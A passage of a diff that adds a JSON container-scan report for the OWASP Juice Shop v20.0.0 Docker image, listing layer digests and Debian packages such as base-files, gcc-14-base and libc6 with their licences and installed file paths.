"https://github.com/juice-shop/juice-shop", + "org.opencontainers.image.title": "OWASP Juice Shop", + "org.opencontainers.image.url": "https://owasp-juice.shop", + "org.opencontainers.image.vendor": "Open Worldwide Application Security Project", + "org.opencontainers.image.version": "20.0.0" + }, + "User": "65532", + "WorkingDir": "/juice-shop", + "ExposedPorts": { + "3000/tcp": {} + }, + "ArgsEscaped": true + } + }, + "Layers": [ + { + "Size": 337920, + "Digest": "sha256:fa8ae93e2b3a7478248483e942ff665efa7219c6cd72d7a03c775372076e98dc", + "DiffID": "sha256:82c60ccaf916322916d16bcdb4223f93acc1f68e2087dba4ddf64990b1dc27fb" + }, + { + "Size": 40960, + "Digest": "sha256:c172f21841dff4c8cf45cde46589c1c2616cefe7e819965e92e6d3475c428aa0", + "DiffID": "sha256:621c35e751a51a9a9dc3e80aa0b7fe8be2a93402ea6ccd307d30852cd7776cda" + }, + { + "Size": 1167360, + "Digest": "sha256:b4e6f1bfce0a1fba2b5421041552f4a897aada9cd5680926580f9e2c6247a7ae", + "DiffID": "sha256:ac2a91ec876dfaf2145e14b0b43ce6b3ea3d4edb28a0df9d91c52f2efbb8e1a7" + }, + { + "Size": 1331200, + "Digest": "sha256:b4242723c53fe4e094eb78569a2c15b6aafb8eb42aa9c3c2666130654a316ae2", + "DiffID": "sha256:f15316efa9979a44eee43172e640630f60407180eff3d985274befd600bb227d" + }, + { + "Size": 102400, + "Digest": "sha256:d6b1b89eccacc15c2420b2776d72c1dae334a00805ed9af54bf2f71e4d536f28", + "DiffID": "sha256:275a30dd8ce958b21daa9ad962c6fbc09f98306ee2f486b65c9075dc257b1412" + }, + { + "Size": 1536, + "Digest": "sha256:2780920e5dbfbe103d03a583ed75345306e572ec5a48cb10361f046767d9f29a", + "DiffID": "sha256:4d049f83d9cf21d1f5cc0e11deaf36df02790d0e60c1a3829538fb4b61685368" + }, + { + "Size": 2560, + "Digest": "sha256:7c12895b777bcaa8ccae0605b4de635b68fc32d60fa08f421dc3818bf55ee212", + "DiffID": "sha256:af5aa97ebe6ce1604747ec1e21af7136ded391bcabe4acef882e718a87c86bcc" + }, + { + "Size": 2560, + "Digest": "sha256:3214acf345c0cc6bbdb56b698a41ccdefc624a09d6beb0d38b5de0b2303ecaf4", + "DiffID": "sha256:6f1cdceb6a3146f0ccb986521156bef8a422cdbb0863396f7f751f575ba308f4" + }, + { + "Size": 2560, + "Digest": "sha256:52630fc75a18675c530ed9eba5f55eca09b03e91bd5bc15307918bbc1a7e7296", + "DiffID": "sha256:bd3cdfae1d3fdd83a2231d608969b38b82349777c2fff9a7c12d54f8ac5c9b38" + }, + { + "Size": 1536, + "Digest": "sha256:dd64bf2dd177757451a98fcdc999a339c35dee5d9872d8f4dc69c8f3c4dd0112", + "DiffID": "sha256:4cde6b0bb6f50a5f255eef7b2a42162c661cf776b803225dcac9a659e396bb6b" + }, + { + "Size": 2048, + "Digest": "sha256:b839dfae01f66e15c6a8b63520557ed315bdfe036342fa7a0c537259f10d7a9a", + "DiffID": "sha256:ad51d0769d16ba578106a177987dfe3d2e02c1668c852b795b2f6b024068242a" + }, + { + "Size": 3072, + "Digest": "sha256:ebddc55facdc6b1f7e0f30816a5fc7cc62f38abdf76c0a8b0a0ce52085754795", + "DiffID": "sha256:187cfc6d1e3e8a40a5e64653bcd3239c140807dcf1c09e48021178705a5a6139" + }, + { + "Size": 249344, + "Digest": "sha256:bdfd7f7e5bf6fc27e70b59101db21c3d8284d283884419dd5fe7020583bb79ca", + "DiffID": "sha256:5fd2536c39c0700be8b7b4344e375196da2f126842fd8ede66996a18860a3890" + }, + { + "Size": 13291520, + "Digest": "sha256:4ec36cb7292a44a45129867ef6d6ae1715956938fbca32c926ec0f600d884101", + "DiffID": "sha256:318bc252656ce5b3c77fc9a13e302bba683f813d4b19c21be6e0ad3acc7adaf1" + }, + { + "Size": 8017920, + "Digest": "sha256:b73b1097e3a18c388a239e24aee83f0b69599a806a6cf62d08fa0f72e3240c28", + "DiffID": "sha256:1a6e423bca2d12ae8428c7b3a06be964f6166ecd4d90d8d30bfcc99c40740dc7" + }, + { + "Size": 870400, + "Digest": "sha256:bd8962e292918c50c90edebd9684c053bc386b9c5503acd8fec75d0c6f93a0b7", + "DiffID": "sha256:c0e409312adc366898967307565f692bb33d43a439d3de48e27d14b742389725" + }, + { + "Size": 174080, + "Digest": "sha256:cac2ae0193cb073e7492050b05fc342a888651b4bbc966908c8793f889c299ba", + "DiffID": "sha256:e4ba966d7f0527dfe0fcb559e4e18d4da42c4e6beae924719255e0dedb554ed0" + }, + { + "Size": 358400, + "Digest": "sha256:dd0d9bfd3bee080ad25a464362ec4f37ec5ca625695a4d7179fe69d207dc068d", + "DiffID": "sha256:1f5d28bd51650f429293f7730ede274b81dc0744aa918bc887133c4ad610258c" + }, + { + "Size": 2662400, + "Digest": "sha256:7cc70dfd88cf2327bb827123c9156f7cb95de95b2f98f3a7a931296aacec5786", + "DiffID": "sha256:6e18ad80f3d64a8cbbcd1ff2e8a0d5ce7282cf664e816b86183a59d30a618e8a" + }, + { + "Size": 194560, + "Digest": "sha256:8224d91da70b7992430d3b04040ea38ecdef4a7b719bee38397c89aaa886e198", + "DiffID": "sha256:c16b2ec4b1493bad1b1de23d659c899e60abb166bda756d02792f0a03ba54a43" + }, + { + "Size": 122880, + "Digest": "sha256:1a4be5562d92d659f95e0b44b245ea5208bf5317481b9a351b07fad7fe5265ec", + "DiffID": "sha256:7db505d90756626f425c6c5468eca565c82f589b144ecaa4f411ad9bbf79e614" + }, + { + "Size": 123054080, + "Digest": "sha256:7281cbae89a9bbe68e9fb60ed7ea9b1433a019781e1c57b3a99d200be62ab156", + "DiffID": "sha256:4132b571d763a067f04f6b40386fc72b4e315885abd5ef369b8156cef6cd57bd" + }, + { + "Size": 1536, + "Digest": "sha256:f61ecd72bbe6ba4e6bcf767e0e4b2401bcde609805e7dae86f40e732d6eb5bfd", + "DiffID": "sha256:07a1a08836845627bd5c8fe5288e0b9109ee181fbed897af7f5ae490f4606401" + }, + { + "Size": 231617024, + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + } + ] + }, + "Results": [ + { + "Target": "bkimminich/juice-shop:v20.0.0 (debian 13.4)", + "Class": "os-pkgs", + "Type": "debian", + "Packages": [ + { + "ID": "base-files@13.8+deb13u4", + "Name": "base-files", + "Identifier": { + "PURL": "pkg:deb/debian/base-files@13.8%2Bdeb13u4?arch=amd64\u0026distro=debian-13.4", + "UID": "37f596265872b287" + }, + "Version": "13.8+deb13u4", + "Arch": "amd64", + "SrcName": "base-files", + "SrcVersion": "13.8+deb13u4", + "Licenses": [ + "GPL-2.0-or-later", + "verbatim" + ], + "Maintainer": "Santiago Vila \u003csanvila@debian.org\u003e", + "Repository": { + "Class": "official" + }, + "Layer": { + "Digest": "sha256:fa8ae93e2b3a7478248483e942ff665efa7219c6cd72d7a03c775372076e98dc", + "DiffID": "sha256:82c60ccaf916322916d16bcdb4223f93acc1f68e2087dba4ddf64990b1dc27fb" + }, + "InstalledFiles": [ + "/usr/lib/os-release", + "/usr/share/base-files/dot.bashrc", + "/usr/share/base-files/dot.profile", + "/usr/share/base-files/dot.profile.md5sums", + "/usr/share/base-files/info.dir", + "/usr/share/base-files/motd", + "/usr/share/base-files/profile", + "/usr/share/base-files/profile.md5sums", + "/usr/share/base-files/staff-group-for-usr-local", + "/usr/share/common-licenses/Apache-2.0", + "/usr/share/common-licenses/Artistic", + "/usr/share/common-licenses/BSD", + "/usr/share/common-licenses/CC0-1.0", + "/usr/share/common-licenses/GFDL-1.2", + "/usr/share/common-licenses/GFDL-1.3", + "/usr/share/common-licenses/GPL-1", + "/usr/share/common-licenses/GPL-2", + "/usr/share/common-licenses/GPL-3", + "/usr/share/common-licenses/LGPL-2", + "/usr/share/common-licenses/LGPL-2.1", + "/usr/share/common-licenses/LGPL-3", + "/usr/share/common-licenses/MPL-1.1", + "/usr/share/common-licenses/MPL-2.0", + "/usr/share/doc/base-files/NEWS.Debian.gz", + "/usr/share/doc/base-files/README", + "/usr/share/doc/base-files/README.FHS", + "/usr/share/doc/base-files/changelog.gz", + "/usr/share/doc/base-files/copyright", + "/usr/share/lintian/overrides/base-files" + ], + "AnalyzedBy": "dpkg" + }, + { + "ID": "gcc-14-base@14.2.0-19", + "Name": "gcc-14-base", + "Identifier": { + "PURL": "pkg:deb/debian/gcc-14-base@14.2.0-19?arch=amd64\u0026distro=debian-13.4", + "UID": "b1ea1d46235e5bf5" + }, + "Version": "14.2.0", + "Release": "19", + "Arch": "amd64", + "SrcName": "gcc-14", + "SrcVersion": "14.2.0", + "SrcRelease": "19", + "Licenses": [ + "GPL-2.0-or-later", + "GPL-3.0-only", + "GFDL-1.2-only", + "Artistic-2.0", + "LGPL-2.0-or-later" + ], + "Maintainer": "Debian GCC Maintainers \u003cdebian-gcc@lists.debian.org\u003e", + "Repository": { + "Class": "official" + }, + "Layer": { + "Digest": "sha256:1a4be5562d92d659f95e0b44b245ea5208bf5317481b9a351b07fad7fe5265ec", + "DiffID": "sha256:7db505d90756626f425c6c5468eca565c82f589b144ecaa4f411ad9bbf79e614" + }, + "InstalledFiles": [ + "/usr/share/doc/gcc-14-base/README.Debian.amd64.gz", + "/usr/share/doc/gcc-14-base/TODO.Debian", + "/usr/share/doc/gcc-14-base/changelog.Debian.gz", + "/usr/share/doc/gcc-14-base/copyright" + ], + "AnalyzedBy": "dpkg" + }, + { + "ID": "libc6@2.41-12+deb13u2", + "Name": "libc6", + "Identifier": { + "PURL": "pkg:deb/debian/libc6@2.41-12%2Bdeb13u2?arch=amd64\u0026distro=debian-13.4", + "UID": "5d316ea4f48d7ebc" + }, + "Version": "2.41", + "Release": "12+deb13u2", + "Arch": "amd64", + "SrcName": "glibc", + "SrcVersion": "2.41", + "SrcRelease": "12+deb13u2", + "Licenses": [ + "LGPL-2.1-or-later", + "LGPL-2.0-or-later", + "LGPL-2.1+-with-link-exception", + "LGPL-3.0-or-later", + "GPL-2.0-or-later", + "GPL-2+-with-link-exception", + "GPL-2.0-only", + "GPL-3.0-or-later", + "FSFAP", + "Carnegie", + "Inner-Net", + "MIT-like-Lord", + "BSD-like-Spencer", + "PCRE", + "BSD-3-clause-Carnegie", + "Unicode-DFS-2016", + "BSL-1.0", + "SunPro", + "CORE-MATH", + "BSD-3-clause-Berkeley", + "BSD-3-clause-WIDE", + "BSD-2-Clause", + "BSD-3-clause-Oracle", + "DEC", + "IBM", + "ISC", + "Univ-Coimbra", + "public-domain", + "GPL-3.0-only", + "LGPL-2.0-only", + "LGPL-2.1-only", + "LGPL-3.0-only" + ], + "Maintainer": "GNU Libc Maintainers \u003cdebian-glibc@lists.debian.org\u003e", + "Repository": { + "Class": "official" + }, + "Layer": { + "Digest": "sha256:4ec36cb7292a44a45129867ef6d6ae1715956938fbca32c926ec0f600d884101", + "DiffID": "sha256:318bc252656ce5b3c77fc9a13e302bba683f813d4b19c21be6e0ad3acc7adaf1" + }, + "InstalledFiles": [ + "/usr/lib/x86_64-linux-gnu/gconv/ANSI_X3.110.so", + "/usr/lib/x86_64-linux-gnu/gconv/ARMSCII-8.so", + "/usr/lib/x86_64-linux-gnu/gconv/ASMO_449.so", + "/usr/lib/x86_64-linux-gnu/gconv/BIG5.so", + "/usr/lib/x86_64-linux-gnu/gconv/BIG5HKSCS.so", + "/usr/lib/x86_64-linux-gnu/gconv/BRF.so", + "/usr/lib/x86_64-linux-gnu/gconv/CP10007.so", + "/usr/lib/x86_64-linux-gnu/gconv/CP1125.so", + "/usr/lib/x86_64-linux-gnu/gconv/CP1250.so", + "/usr/lib/x86_64-linux-gnu/gconv/CP1251.so", + "/usr/lib/x86_64-linux-gnu/gconv/CP1252.so", + "/usr/lib/x86_64-linux-gnu/gconv/CP1253.so", + "/usr/lib/x86_64-linux-gnu/gconv/CP1254.so", + "/usr/lib/x86_64-linux-gnu/gconv/CP1255.so", + "/usr/lib/x86_64-linux-gnu/gconv/CP1256.so", + "/usr/lib/x86_64-linux-gnu/gconv/CP1257.so", + "/usr/lib/x86_64-linux-gnu/gconv/CP1258.so", + "/usr/lib/x86_64-linux-gnu/gconv/CP737.so", + "/usr/lib/x86_64-linux-gnu/gconv/CP770.so", + "/usr/lib/x86_64-linux-gnu/gconv/CP771.so", + "/usr/lib/x86_64-linux-gnu/gconv/CP772.so", + "/usr/lib/x86_64-linux-gnu/gconv/CP773.so", + "/usr/lib/x86_64-linux-gnu/gconv/CP774.so", + "/usr/lib/x86_64-linux-gnu/gconv/CP775.so", + "/usr/lib/x86_64-linux-gnu/gconv/CP932.so", + "/usr/lib/x86_64-linux-gnu/gconv/CSN_369103.so", + "/usr/lib/x86_64-linux-gnu/gconv/CWI.so", + "/usr/lib/x86_64-linux-gnu/gconv/DEC-MCS.so", + "/usr/lib/x86_64-linux-gnu/gconv/EBCDIC-AT-DE-A.so", + "/usr/lib/x86_64-linux-gnu/gconv/EBCDIC-AT-DE.so", + "/usr/lib/x86_64-linux-gnu/gconv/EBCDIC-CA-FR.so", + "/usr/lib/x86_64-linux-gnu/gconv/EBCDIC-DK-NO-A.so", + "/usr/lib/x86_64-linux-gnu/gconv/EBCDIC-DK-NO.so", + "/usr/lib/x86_64-linux-gnu/gconv/EBCDIC-ES-A.so", + "/usr/lib/x86_64-linux-gnu/gconv/EBCDIC-ES-S.so", + "/usr/lib/x86_64-linux-gnu/gconv/EBCDIC-ES.so", + "/usr/lib/x86_64-linux-gnu/gconv/EBCDIC-FI-SE-A.so", + "/usr/lib/x86_64-linux-gnu/gconv/EBCDIC-FI-SE.so", + "/usr/lib/x86_64-linux-gnu/gconv/EBCDIC-FR.so", + "/usr/lib/x86_64-linux-gnu/gconv/EBCDIC-IS-FRISS.so", + "/usr/lib/x86_64-linux-gnu/gconv/EBCDIC-IT.so", + "/usr/lib/x86_64-linux-gnu/gconv/EBCDIC-PT.so", + "/usr/lib/x86_64-linux-gnu/gconv/EBCDIC-UK.so", + "/usr/lib/x86_64-linux-gnu/gconv/EBCDIC-US.so", + "/usr/lib/x86_64-linux-gnu/gconv/ECMA-CYRILLIC.so", + "/usr/lib/x86_64-linux-gnu/gconv/EUC-CN.so", + "/usr/lib/x86_64-linux-gnu/gconv/EUC-JISX0213.so", + "/usr/lib/x86_64-linux-gnu/gconv/EUC-JP-MS.so", + "/usr/lib/x86_64-linux-gnu/gconv/EUC-JP.so", + "/usr/lib/x86_64-linux-gnu/gconv/EUC-KR.so", + "/usr/lib/x86_64-linux-gnu/gconv/EUC-TW.so", + "/usr/lib/x86_64-linux-gnu/gconv/GB18030.so", + "/usr/lib/x86_64-linux-gnu/gconv/GBBIG5.so", + "/usr/lib/x86_64-linux-gnu/gconv/GBGBK.so", + "/usr/lib/x86_64-linux-gnu/gconv/GBK.so", + "/usr/lib/x86_64-linux-gnu/gconv/GEORGIAN-ACADEMY.so", + "/usr/lib/x86_64-linux-gnu/gconv/GEORGIAN-PS.so", + "/usr/lib/x86_64-linux-gnu/gconv/GOST_19768-74.so", + "/usr/lib/x86_64-linux-gnu/gconv/GREEK-CCITT.so", + "/usr/lib/x86_64-linux-gnu/gconv/GREEK7-OLD.so", + "/usr/lib/x86_64-linux-gnu/gconv/GREEK7.so", + "/usr/lib/x86_64-linux-gnu/gconv/HP-GREEK8.so", + "/usr/lib/x86_64-linux-gnu/gconv/HP-ROMAN8.so", + "/usr/lib/x86_64-linux-gnu/gconv/HP-ROMAN9.so", + "/usr/lib/x86_64-linux-gnu/gconv/HP-THAI8.so", + "/usr/lib/x86_64-linux-gnu/gconv/HP-TURKISH8.so", + "/usr/lib/x86_64-linux-gnu/gconv/IBM037.so", + "/usr/lib/x86_64-linux-gnu/gconv/IBM038.so", + "/usr/lib/x86_64-linux-gnu/gconv/IBM1004.so", + "/usr/lib/x86_64-linux-gnu/gconv/IBM1008.so", + "/usr/lib/x86_64-linux-gnu/gconv/IBM1008_420.so", + "/usr/lib/x86_64-linux-gnu/gconv/IBM1025.so", + "/usr/lib/x86_64-linux-gnu/gconv/IBM1026.so", + "/usr/lib/x86_64-linux-gnu/gconv/IBM1046.so", + "/usr/lib/x86_64-linux-gnu/gconv/IBM1047.so", + "/usr/lib/x86_64-linux-gnu/gconv/IBM1097.so", + "/usr/lib/x86_64-linux-gnu/gconv/IBM1112.so", + "/usr/lib/x86_64-linux-gnu/gconv/IBM1122.so", + "/usr/lib/x86_64-linux-gnu/gconv/IBM1123.so", + "/usr/lib/x86_64-linux-gnu/gconv/IBM1124.so", + "/usr/lib/x86_64-linux-gnu/gconv/IBM1129.so", + "/usr/lib/x86_64-linux-gnu/gconv/IBM1130.so", + "/usr/lib/x86_64-linux-gnu/gconv/IBM1132.so", + "/usr/lib/x86_64-linux-gnu/gconv/IBM1133.so", + "/usr/lib/x86_64-linux-gnu/gconv/IBM1137.so", + "/usr/lib/x86_64-linux-gnu/gconv/IBM1140.so", + "/usr/lib/x86_64-linux-gnu/gconv/IBM1141.so", + "/usr/lib/x86_64-linux-gnu/gconv/IBM1142.so", + "/usr/lib/x86_64-linux-gnu/gconv/IBM1143.so", + "/usr/lib/x86_64-linux-gnu/gconv/IBM1144.so", + "/usr/lib/x86_64-linux-gnu/gconv/IBM1145.so", + "/usr/lib/x86_64-linux-gnu/gconv/IBM1146.so", + "/usr/lib/x86_64-linux-gnu/gconv/IBM1147.so", + "/usr/lib/x86_64-linux-gnu/gconv/IBM1148.so", + "/usr/lib/x86_64-linux-gnu/gconv/IBM1149.so", + "/usr/lib/x86_64-linux-gnu/gconv/IBM1153.so", + "/usr/lib/x86_64-linux-gnu/gconv/IBM1154.so", + "/usr/lib/x86_64-linux-gnu/gconv/IBM1155.so", + "/usr/lib/x86_64-linux-gnu/gconv/IBM1156.so", + "/usr/lib/x86_64-linux-gnu/gconv/IBM1157.so", + "/usr/lib/x86_64-linux-gnu/gconv/IBM1158.so", + "/usr/lib/x86_64-linux-gnu/gconv/IBM1160.so", + "/usr/lib/x86_64-linux-gnu/gconv/IBM1161.so", + "/usr/lib/x86_64-linux-gnu/gconv/IBM1162.so", + "/usr/lib/x86_64-linux-gnu/gconv/IBM1163.so", + "/usr/lib/x86_64-linux-gnu/gconv/IBM1164.so", + "/usr/lib/x86_64-linux-gnu/gconv/IBM1166.so", + "/usr/lib/x86_64-linux-gnu/gconv/IBM1167.so", + "/usr/lib/x86_64-linux-gnu/gconv/IBM12712.so", + "/usr/lib/x86_64-linux-gnu/gconv/IBM1364.so", + "/usr/lib/x86_64-linux-gnu/gconv/IBM1371.so", + "/usr/lib/x86_64-linux-gnu/gconv/IBM1388.so", + "/usr/lib/x86_64-linux-gnu/gconv/IBM1390.so", + "/usr/lib/x86_64-linux-gnu/gconv/IBM1399.so", + "/usr/lib/x86_64-linux-gnu/gconv/IBM16804.so", + "/usr/lib/x86_64-linux-gnu/gconv/IBM256.so", + "/usr/lib/x86_64-linux-gnu/gconv/IBM273.so", + "/usr/lib/x86_64-linux-gnu/gconv/IBM274.so", + "/usr/lib/x86_64-linux-gnu/gconv/IBM275.so", + "/usr/lib/x86_64-linux-gnu/gconv/IBM277.so", + "/usr/lib/x86_64-linux-gnu/gconv/IBM278.so", + "/usr/lib/x86_64-linux-gnu/gconv/IBM280.so", + "/usr/lib/x86_64-linux-gnu/gconv/IBM281.so", + "/usr/lib/x86_64-linux-gnu/gconv/IBM284.so", + "/usr/lib/x86_64-linux-gnu/gconv/IBM285.so", + "/usr/lib/x86_64-linux-gnu/gconv/IBM290.so", + "/usr/lib/x86_64-linux-gnu/gconv/IBM297.so", + "/usr/lib/x86_64-linux-gnu/gconv/IBM420.so", + "/usr/lib/x86_64-linux-gnu/gconv/IBM423.so", + "/usr/lib/x86_64-linux-gnu/gconv/IBM424.so", + "/usr/lib/x86_64-linux-gnu/gconv/IBM437.so", + "/usr/lib/x86_64-linux-gnu/gconv/IBM4517.so", + "/usr/lib/x86_64-linux-gnu/gconv/IBM4899.so", + "/usr/lib/x86_64-linux-gnu/gconv/IBM4909.so", + "/usr/lib/x86_64-linux-gnu/gconv/IBM4971.so", + "/usr/lib/x86_64-linux-gnu/gconv/IBM500.so", + "/usr/lib/x86_64-linux-gnu/gconv/IBM5347.so", + "/usr/lib/x86_64-linux-gnu/gconv/IBM803.so", + "/usr/lib/x86_64-linux-gnu/gconv/IBM850.so", + "/usr/lib/x86_64-linux-gnu/gconv/IBM851.so", + "/usr/lib/x86_64-linux-gnu/gconv/IBM852.so", + "/usr/lib/x86_64-linux-gnu/gconv/IBM855.so", + "/usr/lib/x86_64-linux-gnu/gconv/IBM856.so", + "/usr/lib/x86_64-linux-gnu/gconv/IBM857.so", + "/usr/lib/x86_64-linux-gnu/gconv/IBM858.so", + "/usr/lib/x86_64-linux-gnu/gconv/IBM860.so", + "/usr/lib/x86_64-linux-gnu/gconv/IBM861.so", + "/usr/lib/x86_64-linux-gnu/gconv/IBM862.so", + "/usr/lib/x86_64-linux-gnu/gconv/IBM863.so", + "/usr/lib/x86_64-linux-gnu/gconv/IBM864.so", + "/usr/lib/x86_64-linux-gnu/gconv/IBM865.so", + "/usr/lib/x86_64-linux-gnu/gconv/IBM866.so", + "/usr/lib/x86_64-linux-gnu/gconv/IBM866NAV.so", + "/usr/lib/x86_64-linux-gnu/gconv/IBM868.so", + "/usr/lib/x86_64-linux-gnu/gconv/IBM869.so", + "/usr/lib/x86_64-linux-gnu/gconv/IBM870.so", + "/usr/lib/x86_64-linux-gnu/gconv/IBM871.so", + "/usr/lib/x86_64-linux-gnu/gconv/IBM874.so", + "/usr/lib/x86_64-linux-gnu/gconv/IBM875.so", + "/usr/lib/x86_64-linux-gnu/gconv/IBM880.so", + "/usr/lib/x86_64-linux-gnu/gconv/IBM891.so", + "/usr/lib/x86_64-linux-gnu/gconv/IBM901.so", + "/usr/lib/x86_64-linux-gnu/gconv/IBM902.so", + "/usr/lib/x86_64-linux-gnu/gconv/IBM903.so", + "/usr/lib/x86_64-linux-gnu/gconv/IBM9030.so", + "/usr/lib/x86_64-linux-gnu/gconv/IBM904.so", + "/usr/lib/x86_64-linux-gnu/gconv/IBM905.so", + "/usr/lib/x86_64-linux-gnu/gconv/IBM9066.so", + "/usr/lib/x86_64-linux-gnu/gconv/IBM918.so", + "/usr/lib/x86_64-linux-gnu/gconv/IBM921.so", + "/usr/lib/x86_64-linux-gnu/gconv/IBM922.so", + "/usr/lib/x86_64-linux-gnu/gconv/IBM930.so", + "/usr/lib/x86_64-linux-gnu/gconv/IBM932.so", + "/usr/lib/x86_64-linux-gnu/gconv/IBM933.so", + "/usr/lib/x86_64-linux-gnu/gconv/IBM935.so", + "/usr/lib/x86_64-linux-gnu/gconv/IBM937.so", + "/usr/lib/x86_64-linux-gnu/gconv/IBM939.so", + "/usr/lib/x86_64-linux-gnu/gconv/IBM943.so", + "/usr/lib/x86_64-linux-gnu/gconv/IBM9448.so", + "/usr/lib/x86_64-linux-gnu/gconv/IEC_P27-1.so", + "/usr/lib/x86_64-linux-gnu/gconv/INIS-8.so", + "/usr/lib/x86_64-linux-gnu/gconv/INIS-CYRILLIC.so", + "/usr/lib/x86_64-linux-gnu/gconv/INIS.so", + "/usr/lib/x86_64-linux-gnu/gconv/ISIRI-3342.so", + "/usr/lib/x86_64-linux-gnu/gconv/ISO-2022-CN-EXT.so", + "/usr/lib/x86_64-linux-gnu/gconv/ISO-2022-CN.so", + "/usr/lib/x86_64-linux-gnu/gconv/ISO-2022-JP-3.so", + "/usr/lib/x86_64-linux-gnu/gconv/ISO-2022-JP.so", + "/usr/lib/x86_64-linux-gnu/gconv/ISO-2022-KR.so", + "/usr/lib/x86_64-linux-gnu/gconv/ISO-IR-197.so", + "/usr/lib/x86_64-linux-gnu/gconv/ISO-IR-209.so", + "/usr/lib/x86_64-linux-gnu/gconv/ISO646.so", + "/usr/lib/x86_64-linux-gnu/gconv/ISO8859-1.so", + "/usr/lib/x86_64-linux-gnu/gconv/ISO8859-10.so", + "/usr/lib/x86_64-linux-gnu/gconv/ISO8859-11.so", + "/usr/lib/x86_64-linux-gnu/gconv/ISO8859-13.so", + "/usr/lib/x86_64-linux-gnu/gconv/ISO8859-14.so", + "/usr/lib/x86_64-linux-gnu/gconv/ISO8859-15.so", + "/usr/lib/x86_64-linux-gnu/gconv/ISO8859-16.so", + "/usr/lib/x86_64-linux-gnu/gconv/ISO8859-2.so", + "/usr/lib/x86_64-linux-gnu/gconv/ISO8859-3.so", + "/usr/lib/x86_64-linux-gnu/gconv/ISO8859-4.so", + "/usr/lib/x86_64-linux-gnu/gconv/ISO8859-5.so", + "/usr/lib/x86_64-linux-gnu/gconv/ISO8859-6.so", + "/usr/lib/x86_64-linux-gnu/gconv/ISO8859-7.so", + "/usr/lib/x86_64-linux-gnu/gconv/ISO8859-8.so", + "/usr/lib/x86_64-linux-gnu/gconv/ISO8859-9.so", + "/usr/lib/x86_64-linux-gnu/gconv/ISO8859-9E.so", + "/usr/lib/x86_64-linux-gnu/gconv/ISO_10367-BOX.so", + "/usr/lib/x86_64-linux-gnu/gconv/ISO_11548-1.so", + "/usr/lib/x86_64-linux-gnu/gconv/ISO_2033.so", + "/usr/lib/x86_64-linux-gnu/gconv/ISO_5427-EXT.so", + "/usr/lib/x86_64-linux-gnu/gconv/ISO_5427.so", + "/usr/lib/x86_64-linux-gnu/gconv/ISO_5428.so", + "/usr/lib/x86_64-linux-gnu/gconv/ISO_6937-2.so", + "/usr/lib/x86_64-linux-gnu/gconv/ISO_6937.so", + "/usr/lib/x86_64-linux-gnu/gconv/JOHAB.so", + "/usr/lib/x86_64-linux-gnu/gconv/KOI-8.so", + "/usr/lib/x86_64-linux-gnu/gconv/KOI8-R.so", + "/usr/lib/x86_64-linux-gnu/gconv/KOI8-RU.so", + "/usr/lib/x86_64-linux-gnu/gconv/KOI8-T.so", + "/usr/lib/x86_64-linux-gnu/gconv/KOI8-U.so", + "/usr/lib/x86_64-linux-gnu/gconv/LATIN-GREEK-1.so", + "/usr/lib/x86_64-linux-gnu/gconv/LATIN-GREEK.so", + "/usr/lib/x86_64-linux-gnu/gconv/MAC-CENTRALEUROPE.so", + "/usr/lib/x86_64-linux-gnu/gconv/MAC-IS.so", + "/usr/lib/x86_64-linux-gnu/gconv/MAC-SAMI.so", + "/usr/lib/x86_64-linux-gnu/gconv/MAC-UK.so", + "/usr/lib/x86_64-linux-gnu/gconv/MACINTOSH.so", + "/usr/lib/x86_64-linux-gnu/gconv/MIK.so", + "/usr/lib/x86_64-linux-gnu/gconv/NATS-DANO.so", + "/usr/lib/x86_64-linux-gnu/gconv/NATS-SEFI.so", + "/usr/lib/x86_64-linux-gnu/gconv/PT154.so", + "/usr/lib/x86_64-linux-gnu/gconv/RK1048.so", + "/usr/lib/x86_64-linux-gnu/gconv/SAMI-WS2.so", + "/usr/lib/x86_64-linux-gnu/gconv/SHIFT_JISX0213.so", + "/usr/lib/x86_64-linux-gnu/gconv/SJIS.so", + "/usr/lib/x86_64-linux-gnu/gconv/T.61.so", + "/usr/lib/x86_64-linux-gnu/gconv/TCVN5712-1.so", + "/usr/lib/x86_64-linux-gnu/gconv/TIS-620.so", + "/usr/lib/x86_64-linux-gnu/gconv/TSCII.so", + "/usr/lib/x86_64-linux-gnu/gconv/UHC.so", + "/usr/lib/x86_64-linux-gnu/gconv/UNICODE.so", + "/usr/lib/x86_64-linux-gnu/gconv/UTF-16.so", + "/usr/lib/x86_64-linux-gnu/gconv/UTF-32.so", + "/usr/lib/x86_64-linux-gnu/gconv/UTF-7.so", + "/usr/lib/x86_64-linux-gnu/gconv/VISCII.so", + "/usr/lib/x86_64-linux-gnu/gconv/gconv-modules", + "/usr/lib/x86_64-linux-gnu/gconv/gconv-modules.cache", + "/usr/lib/x86_64-linux-gnu/gconv/gconv-modules.d/gconv-modules-extra.conf", + "/usr/lib/x86_64-linux-gnu/gconv/libCNS.so", + "/usr/lib/x86_64-linux-gnu/gconv/libGB.so", + "/usr/lib/x86_64-linux-gnu/gconv/libISOIR165.so", + "/usr/lib/x86_64-linux-gnu/gconv/libJIS.so", + "/usr/lib/x86_64-linux-gnu/gconv/libJISX0213.so", + "/usr/lib/x86_64-linux-gnu/gconv/libKSC.so", + "/usr/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2", + "/usr/lib/x86_64-linux-gnu/libBrokenLocale.so.1", + "/usr/lib/x86_64-linux-gnu/libanl.so.1", + "/usr/lib/x86_64-linux-gnu/libc.so.6", + "/usr/lib/x86_64-linux-gnu/libc_malloc_debug.so.0", + "/usr/lib/x86_64-linux-gnu/libdl.so.2", + "/usr/lib/x86_64-linux-gnu/libm.so.6", + "/usr/lib/x86_64-linux-gnu/libmemusage.so", + "/usr/lib/x86_64-linux-gnu/libmvec.so.1", + "/usr/lib/x86_64-linux-gnu/libnsl.so.1", + "/usr/lib/x86_64-linux-gnu/libnss_compat.so.2", + "/usr/lib/x86_64-linux-gnu/libnss_dns.so.2", + "/usr/lib/x86_64-linux-gnu/libnss_files.so.2", + "/usr/lib/x86_64-linux-gnu/libnss_hesiod.so.2", + "/usr/lib/x86_64-linux-gnu/libpcprofile.so", + "/usr/lib/x86_64-linux-gnu/libpthread.so.0", + "/usr/lib/x86_64-linux-gnu/libresolv.so.2", + "/usr/lib/x86_64-linux-gnu/librt.so.1", + "/usr/lib/x86_64-linux-gnu/libthread_db.so.1", + "/usr/lib/x86_64-linux-gnu/libutil.so.1", + "/usr/share/doc/libc6/NEWS.Debian.gz", + "/usr/share/doc/libc6/NEWS.gz", + 